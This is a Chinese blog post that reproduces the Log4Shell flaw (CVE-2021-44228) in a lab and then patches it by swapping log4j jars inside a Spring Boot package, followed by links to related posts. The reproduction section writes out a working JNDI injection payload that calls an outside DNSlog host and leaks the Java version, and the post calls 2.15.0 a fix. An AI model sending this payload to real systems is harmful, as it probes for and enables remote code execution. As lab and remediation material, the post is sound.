ApacheLog4j2.xRCE漏洞修复步骤(CVE-2021-44228)

已于 2023-05-30 12:42:29 修改
阅读量770 收藏
点赞数
分类专栏: 博客记录 学习之旅 文章标签: log4j apache java
于 2022-08-24 14:50:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoZhihouci/article/details/126504387
版权

ApacheLog4j2.xRCE漏洞修复步骤(CVE-2021-44228)

@Time : 2022/8/24 13:41
@Author : 852782749@qq.com

开始编辑~

文章共分为漏洞复现、漏洞修复

漏洞复现

部署log4j2环境,复现漏洞
这里使用vulfocus的log4j2 rce的docker环境中用到的环境包
java -jar c:\Apache_Log4j2\log4j2.jar --server.port=8081

可以自行下载或匹配自己对应业务系统的log4j*.jar包

启动后访问目标地址
在这里插入图片描述

打开dnslog.cn,开始监听
在这里插入图片描述

构造payload

构造payload ${jndi:ldap://${sys:java.version}.d82hcy.dnslog.cn};

将payload 进行url编码 %24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.d82hcy.dnslog.cn%7D

攻击复现

使用浏览器发起访问host+prot/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.d82hcy.dnslog.cn%7D

启动引擎日志记录了对dnslog发起的访问
在这里插入图片描述

切换到dnslog页面进行查看,部分需要单击Refresh Record获取下请求信息

如果能够检测到与下面类似的信息,说明复现成功。
在这里插入图片描述

漏洞修复

下载不受影响的log4j版本https://archive.apache.org/dist/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.zip
jar命令
Soring boot 项目jar包解压之后 修改文件之后 在不依靠开发工具的情况下重新压缩jar包 打包命令如下:
jar -cvf0M log4jup.jar BOOT-INF/ META-INF/ org/
压缩
jar -cvf xxx.jar
解压
jar -xvf xxx.jar
更新
jar -uvf xxx.jar BOOT-INF/classes/application-dev.yml
列出jar包内容
jar -tvf xxx.jar
使用jar解压命令,将log4.jar解压

在这里插入图片描述

在这里插入图片描述

漏洞修复步骤

查询引用了哪些log4j*.jar,在路径\BOOT-INF\lib\下找到两个log4j的包
在这里插入图片描述

使用新版的jar包将其替换
在这里插入图片描述

替换成新版本之后,找到引用的pom.xml文件,在路径\META-INF\maven\com.example\log4j2_rce\下,
在这里插入图片描述

将log4j的version修改为新的版本号,如这里是2.15.0
在这里插入图片描述

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.15.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.15.0</version>
</dependency>

使用jar -cvf0M log4jup.jar BOOT-INF/ META-INF/ org/命令重新压缩成新的jar包,如log4jup.jar
在这里插入图片描述

在这里插入图片描述

此时已完成修复,可以再次重复漏洞复现步骤进行验证,dnslog已经获取不到信息
在这里插入图片描述

思考

乾坤未定,你我皆是黑马

秋点兵
关注
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
2. `apache-log4j-2.12.4-bin.tar.gz`:这是适用于 Java 7 环境的 2.12.4 版本二进制包,包含了针对 CVE-2021-44228 的补丁。 3. `apache-log4j-2.3.2-bin.tar.gz`:这是适用于 Java 6 的 2.3.2 版本二进制包,同样...
Log4j2漏洞修复
derstsea的专栏
12-14 1万+
一、漏洞说明 Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为 2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个j
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4500
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
Log4j2漏洞复现&原理&补丁绕过
最新发布
无问社区的博客
07-17 538
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 3万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
复现apache log4j2(CVE-2021-44228)漏洞,如何修复漏洞
m0_56065966的博客
04-03 288
复现apache log4j2(CVE-2021-44228)漏洞修复漏洞方法
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 6020
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
log4j2漏洞修复
liuyuinsdu的专栏
12-12 3317
一、【紧急补救措施】 (1)修改jvm参数-Dlog4j2.formatMsgNoLookups=true (2)修改配置log4j2.formatMsgNoLookups=True (3)将系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true 首先修改supervisor的配置文件 增加环境变量 遍历一下日志文件,看看是否有攻击 没有人攻击,很好 二、修改依赖库 【影响范围】:Java类产品:...
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 942
log4j2漏洞复现 (CVE-2021-44228)
【渗透测试】log4j漏洞复现和漏洞修复方案
Yb528970805的博客
09-16 1997
2021年12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6490
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
五种常见的DNS攻击类型及应对方式
A_991128a的博客
08-23 718
随着俄乌冲突中网络战的升级,DNS安全成为业界关注的焦点。无论是去年3月份NSA发布的保护性DNS(PDNS)推荐指南,还是俄罗斯互联网的核心——DNS服务在战争期间的大规模启用,都表明DNS安全威胁在不断升级。DNS记录着全球域名与IP地址的一一映射关系,是互联网中最基础的服务之一。由于其在互联网中的重要性以及DNS体系的先天局限性,DNS很容易成为网络攻击的重要目标。
虚拟ldap服务器,什么是LDAP,LDAP服务器是什么?
weixin_28989357的博客
08-13 765
从上述定义不难看出LDAP是一个目录,那么该目录是如何出现,有什么用呢?在当今的信息世界,网络为人们提供了丰富的资源。随着网络资源的日益丰富,迫切需要一种能有效管理资源信息并利于检索查询的服务技术。目录服务技术随之产生。1.LDAP目录服务可以有效地解决众多网络服务的用户账户问题。2.LDAP目录服务规定了统一的身份信息数据库、身份认证机制和接口,实现了资源和信息的统一管理,保证了数据的一致性和完...
Log4j漏洞原理及修复
o0way0o的博客
01-01 2215
*JNDI(Java Naming and Directory Interface–Java)**命名和目录接口 是Java中为命名和目录服务提供接口的API,通过名字可知道,JNDI主要由两部分组成:Naming(命名)和Directory(目录),其中Naming是指将对象通过唯一标识符绑定到一个上下文Context,同时可通过唯一标识符查找获得对象,而Directory主要指将某一对象的属性绑定到Directory的上下文DirContext中,同时可通过名字获取对象的属性同时操作属性。
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。...总之,Apache Log4j2CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值